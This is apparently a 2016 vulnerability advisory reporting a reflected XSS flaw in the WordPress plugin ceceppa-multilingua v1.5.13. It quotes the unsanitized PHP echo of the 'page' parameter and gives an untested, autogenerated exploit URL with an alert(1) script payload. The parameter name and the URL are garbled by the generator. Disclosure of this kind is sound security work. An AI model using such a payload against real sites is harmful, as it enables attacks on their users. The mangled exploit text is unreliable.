Larry Cashdollar Vulnerability

Advisory #: 438

Title: Reflected XSS in wordpress plugin ceceppa-multilingua v1.5.13

Author: Larry W. Cashdollar, @_larry0

Date: 2016-02-09

Download Site: https://wordpress.org/plugins/ceceppa-multilingua

Downloads: 59062

Vendor Notified: 2016-02-09

Export: Json

Vendor Contact: plugins@wordpress.org

Plugin Name: ceceppa-multilingua

Vulnerability:

There is a reflected XSS vulnerability in the following php code ./ceceppa-multilingua/admin/admin-options.php: 109: <input type="hidden" name="page" value="<?php echo $_GET[ 'page' ] ?>" /> The variable page' ] ?>" /> appears to send unsanitized data back to the users browser.

CVE-ID: Not Released

File:./ceceppa-multilingua/admin/admin-options.php

Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.

This is an untested autogenerated exploit:
http://[target]/wp-content/plugins/ceceppa-multilingua/admin/admin-options.php?page ] ?>" />
="><script>alert(1);</script><"